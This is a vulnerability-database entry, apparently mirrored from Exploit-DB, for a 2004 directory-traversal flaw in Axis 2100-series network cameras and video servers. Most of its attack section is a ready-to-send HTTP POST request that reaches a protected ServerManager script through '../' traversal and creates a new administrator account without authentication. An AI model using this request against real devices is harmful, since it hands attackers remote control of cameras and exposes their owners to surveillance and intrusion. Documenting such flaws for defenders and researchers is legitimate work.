Axis Network Camera 2.x And Video Server 1-3 – Directory Traversal

Axis Network Camera 2.x And Video Server 1-3 – Directory Traversal

漏洞ID 1054566 漏洞类型
发布时间 2004-08-23 更新时间 2004-08-23
图片[1]-Axis Network Camera 2.x And Video Server 1-3 – Directory Traversal-安全小百科CVE编号 N/A
图片[2]-Axis Network Camera 2.x And Video Server 1-3 – Directory Traversal-安全小百科CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24401
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11011/info

A directory-traversal vulnerability in HTTP POST requests. This attack is demonstrated by an anonymous user calling protected administration scripts. This bypasses authentication checks and gives anonymous users remote adminitration of the devices.
 
This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.12 thru 2.40
- Axis 2130 network cameras
- Axis 2401,and 2401 video servers

POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0
Content-Length: 250
Pragma: no-cache

conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables

相关推荐: Calife Password Heap Overrun Vulnerability

Calife Password Heap Overrun Vulnerability 漏洞ID 1098922 漏洞类型 Boundary Condition Error 发布时间 2004-02-27 更新时间 2004-02-27 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享